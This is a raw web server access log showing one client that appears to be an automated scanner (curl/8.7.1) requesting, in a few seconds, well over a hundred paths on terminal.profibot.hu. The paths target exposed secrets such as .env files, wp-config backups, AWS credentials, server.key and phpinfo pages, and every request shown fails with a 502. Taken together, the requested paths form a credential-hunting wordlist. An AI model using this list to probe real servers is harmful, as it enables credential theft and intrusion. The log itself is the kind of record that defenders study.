+[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/config/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/src/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/admin/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/public/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/web/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:06 +0000] - - 502 - GET https terminal.profibot.hu "/server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/.env.development" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/.env.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/.env.live" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/admin/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/api/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/app/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/backend/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/src/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/database.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/mail.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/app.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/services.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/configuration.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/aws.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/sendgrid.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/mailgun.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/sendgrid.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/aws.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/api_keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/secrets.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/private/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/backup/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/test/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/dev/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/staging/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/production/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/config/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:07 +0000] - - 502 - GET https terminal.profibot.hu "/app/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/test/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/backup/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/private/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/settings.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/app/settings.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/database.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/config/database.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/administrator/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/cms/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/portal/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/dashboard/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/crm/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/mail/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/mailer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/deployment/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/docker/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/helm/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/terraform/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/ansible/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/config/mail.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/config/smtp.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/config/database.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/secrets/config.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/private/keys.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/.env_example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/core/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/api" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/backend" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/local/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/application/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/phpinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/phpinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/config/settings.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/env/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:08 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env.production" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/new/.env.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/_phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/phpinfo/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/_profiler/phpinfo/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/aws-secret.yaml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/awstats/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/conf/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/cron/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/www/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/docker/app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/env.backup" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/xampp/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/lara/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/lara/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/js/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/nginx/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/site/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/xampp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/.docker/laravel/app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env.production" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/.env.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env.production" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/laravel/core/.env.staging" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/main/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/bootstrap/cache/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/storage/app/private/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/storage/logs/laravel.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/composer.lock" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/server.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/dump.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/php5.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:09 +0000] - - 502 - GET https terminal.profibot.hu "/config.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/src/app.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/server-info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/docker.sh" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/config.php.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/pi.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/test.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php.backup" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/aws-credentials.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/api/info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/config.ini" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/%c0" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/credentials.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.aws/credentials/admin/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.azure-pipelines.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.bak" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.bitbucket-pipelines.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.bitbucket/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.boto" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.bzr/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.c9/metadata/environment/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.circleci/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.circleci/config.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.dockerignore" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env-db" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.back" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.bkp" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.credentials" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.email" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.hidden" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu 